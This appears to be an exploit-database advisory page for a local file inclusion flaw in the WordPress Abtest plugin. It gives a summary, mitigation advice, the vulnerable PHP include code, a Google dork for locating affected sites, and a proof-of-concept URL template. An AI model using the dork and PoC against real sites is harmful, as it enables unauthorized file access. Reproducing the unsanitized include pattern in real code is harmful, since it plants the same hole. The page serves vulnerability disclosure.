header-logo
Suggest Exploit
vendor:
Wordpress Plugin Abtest
by:
CrashBandicot
6.1
CVSS
MEDIUM
Local File Inclusion
22
CWE
Product Name: Wordpress Plugin Abtest
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Chrome
2016

WordPress Plugin Abtest – Local File Inclusion

The Wordpress Plugin Abtest is vulnerable to Local File Inclusion. The vulnerability allows an attacker to include local files on the server by manipulating the 'action' parameter in the 'abtest_admin.php' file. This can lead to unauthorized access to sensitive files and potential remote code execution.

Mitigation:

The plugin vendor should sanitize user input and validate the 'action' parameter to prevent any malicious file inclusion. Users are advised to update to the latest version of the plugin to mitigate this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Abtest - Local File Inclusion
# Date: 2016-03-19
# Google Dork : inurl:/wp-content/plugins/abtest/
# Exploit Author: CrashBandicot
# Vendor Homepage: https://github.com/wp-plugins/abtest
# Tested on: Chrome
  

# Vulnerable File : abtest_admin.php
 
<?php 

require 'admin/functions.php'; 

if (isset($_GET['action'])) {

  include 'admin/' . $_GET['action'] . '.php';

} else {
  
   include 'admin/list_experiments.php'; 
}
?>

# PoC : localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI]
 
# Pics : http://i.imgur.com/jZFKYOc.png